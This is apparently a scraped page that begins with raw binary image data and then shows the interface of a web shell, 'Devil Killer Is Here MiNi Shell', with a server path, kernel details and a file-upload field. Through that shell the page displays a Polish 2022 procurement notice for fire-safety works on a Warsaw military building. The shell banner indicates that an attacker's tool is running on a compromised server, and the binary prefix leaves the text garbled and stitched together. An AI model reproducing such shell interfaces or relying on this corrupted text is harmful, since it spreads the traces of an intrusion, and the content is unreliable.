JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221027/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221027/0041271101-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonanie robót budowlanych dla zadania Przebudowa i<br/>dostosowanie budynku nr 10 do przepisów ppoż. na terenie kompleksu przy ul. 11 Listopada 17/19 w Warszawie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Stołeczny Zarząd Infrastruktury</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">SZI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 013058050</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Al. Jerozolimskie 97</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-909</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">261849377</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">261849316</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">szp.szi@ron.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.szi.ron.mil.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Obrona</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie robót budowlanych dla zadania Przebudowa i<br/>dostosowanie budynku nr 10 do przepisów ppoż. na terenie kompleksu przy ul. 11 Listopada 17/19 w Warszawie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c208ea2f-551d-11ed-9171-f6b7c7d59353</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00412711</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-10-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00011490/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.12 Przebudowa i dostosowanie budynku nr 10 do przepisów ppoż na terenie kompleksu wojskowego</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/szi <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://portal.smartpzp.pl/szi</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 ustawy PZP, podmiotowe środki dowodowe, w tym oświadczenie, o którym mowa w art. 117 ust. 4 ustawy PZP, oraz zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w art. 118 ust. 3 ustawy PZP, przedmiotowe środki dowodowe, pełnomocnictwo, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (Dz.U. z 2020 r. poz. 346, 568, 695, 1517 i 2320). Komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy:<br/>Portal SmartPZP https://portal.smartpzp.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>	administratorem Pani/Pana danych osobowych jest Stołeczny Zarząd Infrastruktury <br/>Al. Jerozolimskie 97, 00-909 Warszawa;<br/>	inspektorem ochrony danych osobowych w Stołecznym Zarządzie Infrastruktury jest Pani Małgorzata SZOSTAK tel. 261-849-386;<br/>	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. C RODO <br/>w celu związanym z zamówieniem publicznym/ realizacją umowy tj. w postępowaniu prowadzonym w trybie podstawowym z możliwością negocjacji na wykonanie robót budowlanych dla zadania: Przebudowa i dostosowanie budynku nr 10 do przepisów ppoż. na terenie kompleksu przy ul. 11 Listopada 17/19 w Warszawie - Sprawa 60/01663/2022;<br/>	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 i 2 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. <br/>z 2019 r. poz. 2019), dalej „ustawa PZP”;<br/>	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, <br/>a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy PZP;<br/>	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane <br/>w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>	posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych jednakże skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu oraz jego załączników;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO. Prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego;<br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>	nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">60/01663/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 371920,00 </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest kompleksowe i kompletne wykonanie robót związanych z budową wyjść ewakuacyjnych i dostosowaniem budynku do aktualnych przepisów ppoż. dla zadania inwestycyjnego nr 01663 „Przebudowa i dostosowanie budynku nr 10 do przepisów ppoż. na terenie kompleksu K - 0023 Warszawa ”. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45421152-4 - Instalowanie ścianek działowych</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45440000-3 - Roboty malarskie i szklarskie</p> <p class="mb-0">45320000-6 - Roboty izolacyjne</p> <p class="mb-0">45262500-6 - Roboty murarskie i murowe</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45421146-9 - Instalowanie sufitów podwieszanych</p> <p class="mb-0">45261210-9 - Wykonywanie pokryć dachowych</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">100 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym: Zamawiający nie określa warunku w niniejszym postępowaniu.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej, o ile wynika to z odrębnych przepisów; Zamawiający żąda aby<br/>Wykonawca posiadał: Zamawiający nie określa warunków w niniejszym postępowaniu.<br/>3) sytuacji ekonomicznej lub finansowej: Wykonawca ma być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną w wysokości nie mniejszej niż 350 000,00 zł. W przypadku kiedy wartość dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia zostanie podana w walucie obcej, Zamawiający dokona przeliczenia tej wartości na wartość w złotych według średniego kursu NBP dla danej waluty z dnia zamieszczenia ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. Jeżeli w dniu zamieszczenia ogłoszenia o zamówieniu, NBP nie opublikuje informacji o średnim kursie walut. Zamawiający dokona odpowiednich przeliczeń wg średniego kursu z pierwszego kolejnego dnia, w którym NBP opublikuje ww. informacje.<br/>4) zdolności technicznej lub zawodowej:<br/>a) Wykonawca ma wykazać, że wykonał nie wcześniej niż w okresie ostatnich<br/>pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie, co najmniej jedną robotę budowlaną<br/>o podobnym charakterze (zakresie) tj. polegającą na budowie lub<br/>przebudowie lub rozbudowie budynku wielofunkcyjnego lub biurowego na<br/>kwotę co najmniej 200 000,00 zł brutto (każda) wraz z podaniem ich rodzaju,<br/>wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te<br/>zostały wykonane, z załączeniem dowodów określających czy te roboty<br/>budowlane zostały wykonane należycie, w szczególności informacji o tym czy<br/>roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa są referencje, bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze. Wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty (Załącznik nr 3 do SWZ). W przypadku podania kwot w walucie obcej, Zamawiający dokona przeliczenia<br/>tej wartości na wartość w złotych według średniego kursu NBP dla danej waluty z dnia zamieszczenia ogłoszenia o zamówieniu w Biuletynie Zamówień<br/>Publicznych. Jeżeli w dniu zamieszczenia ogłoszenia o zamówieniu, NBP nie<br/>opublikuje informacji o średnim kursie walut, Zamawiający dokona odpowiednich przeliczeń wg średniego kursu z pierwszego kolejnego dnia, w którym NBP opublikuje ww. informacje.<br/>b) Wykonawca musi dysponować:<br/>- kierownikiem budowy posiadającym uprawnienia budowlane bez<br/>ograniczeń, przynależnym do właściwego Oddziału Izby Architektów lub<br/>właściwej Izby Inżynierów Budownictwa<br/>- kierownikami branżowymi posiadającymi uprawnienia budowlane bez<br/>ograniczeń w specjalności konstrukcyjno-budowlanej, instalacyjnej w zakresie<br/>sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych,<br/>wodociągowych i kanalizacyjnych, instalacyjnej w zakresie sieci, instalacji<br/>i urządzeń elektrycznych i elektroenergetycznych oraz przynależącymi do<br/>właściwego Oddziału Izby Architektów lub właściwej Izby Inżynierów<br/>Budownictwa. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy PZP Zamawiający wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych:<br/>1) Oświadczenie Wykonawcy o aktualności informacji (Załącznik nr 20 do SWZ) - oddzielnie składa lider, partner konsorcjum, wspólnicy spółki cywilne, podmiot udostępniający zasoby, podwykonawca;<br/>2) Oświadczenia o przynależności lub braku przynależności do tej samej grupy kapitałowej (Załącznik nr 4 do SWZ) - oddzielnie składa lider, partner konsorcjum, wspólnicy spółki cywilnej.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy PZP Zamawiający wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych:<br/>1) dokument potwierdzający ubezpieczanie od odpowiedzialności cywilnej w zakresie<br/>prowadzonej działalności związanej z przedmiotem zamówienia na sumę<br/>gwarancyjną w wysokości nie mniejszej niż 350 000,00 zł.<br/>W przypadku kiedy wartość dokumentu potwierdzającego, że Wykonawca jest<br/>ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności<br/>związanej z przedmiotem zamówienia zostanie podana w walucie obcej,<br/>Zamawiający dokona przeliczenia tej wartości na wartość w złotych według średniego<br/>kursu NBP dla danej waluty z dnia zamieszczenia ogłoszenia o zamówieniu<br/>w Biuletynie Zamówień Publicznych. Jeżeli w dniu zamieszczenia ogłoszenia<br/>o zamówieniu, NBP nie opublikuje informacji o średnim kursie walut, Zamawiający<br/>dokona odpowiednich przeliczeń wg średniego kursu z pierwszego kolejnego dnia,<br/>w którym NBP opublikuje ww. informacje;<br/>2) wykaz robót wykonanych nie wcześniej niż w okresie ostatnich pięciu lat przed<br/>upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy<br/>– w tym okresie: co najmniej jedna robota budowlana o podobnym charakterze<br/>(zakresie) tj. polegająca na budowie lub przebudowie lub rozbudowie budynku<br/>wielofunkcyjnego lub biurowego na kwotę co najmniej 200 000,00 zł brutto<br/>(każda) wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania<br/>i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów<br/>określających czy te roboty budowlane zostały wykonane należycie, w szczególności<br/>informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa<br/>budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa są<br/>referencje, bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty<br/>budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym<br/>charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów - inne<br/>dokumenty (Załącznik nr 3 do SIWZ).<br/>W przypadku podania kwot w walucie obcej, Zamawiający dokona przeliczenia tej<br/>wartości na wartość w złotych według średniego kursu NBP dla danej waluty z dnia<br/>zamieszczenia ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. Jeżeli<br/>w dniu zamieszczenia ogłoszenia o zamówieniu, NBP nie opublikuje informacji<br/>o średnim kursie walut, Zamawiający dokona odpowiednich przeliczeń wg średniego<br/>kursu z pierwszego kolejnego dnia, w którym NBP opublikuje ww. informacje;<br/>3) wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego,<br/>w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz<br/>z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia<br/>i wykształcenia niezbędnego do wykonania zamówienia publicznego, zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie dysponowania tymi<br/>osobami (Załącznik nr 5 do SWZ);<br/>4) oświadczenie kierownika budowy i kierowników branżowych o posiadaniu<br/>uprawnień budowlanych bez ograniczeń oraz oświadczenie o posiadaniu aktualnego<br/>zaświadczenia z właściwego Oddziału Izby Architektów lub z właściwej Izby<br/>Inżynierów Budownictwa potwierdzające przynależność do tej izby i opłacanie<br/>wymaganego ubezpieczenia od odpowiedzialności zawodowej (Załącznik nr 6 do SWZ);</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> W przypadku gdy Wykonawca oświadczy, że w ramach realizacji przedmiotu zamówienia<br/>zastosuje materiały lub urządzenia zgodnie z dokumentacją przetargową nie jest<br/>zobowiązany do złożenia przedmiotowych środków dowodowych.<br/>W przypadku gdy Wykonawca oświadczy, że w ramach realizacji przedmiotu zamówienia<br/>zastosuje materiały lub urządzenia równoważne zobowiązany jest złożyć wraz z ofertą przedmiotowe środki dowodowe np. karty katalogowe urządzeń zawierających ich dane techniczne, parametry. Wskazanie przez Wykonawcę materiałów lub urządzeń równoważnych bez przedstawienia dokumentów na potwierdzenie równoważności spowoduje wezwanie<br/>Wykonawcy do przedstawienia brakujących dokumentów w trybie art. 107 ust. 2 ustawy PZP. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1)	Formularz oferty (Załącznik nr 1 do SWZ).<br/>2)	Oświadczenie do. Spełnienia warunków udziału w postępowaniu oraz braku podstaw wykluczenia (Załącznik nr 2 do SWZ) – oddzielnie składa Wykonawca, Lider konsorcjum, Partner/rzy konsorcjum, wspólnicy spółki cywilnej, podmiot udostępniający zasoby, podwykonawca.<br/>3)	Uproszczone kosztorysy 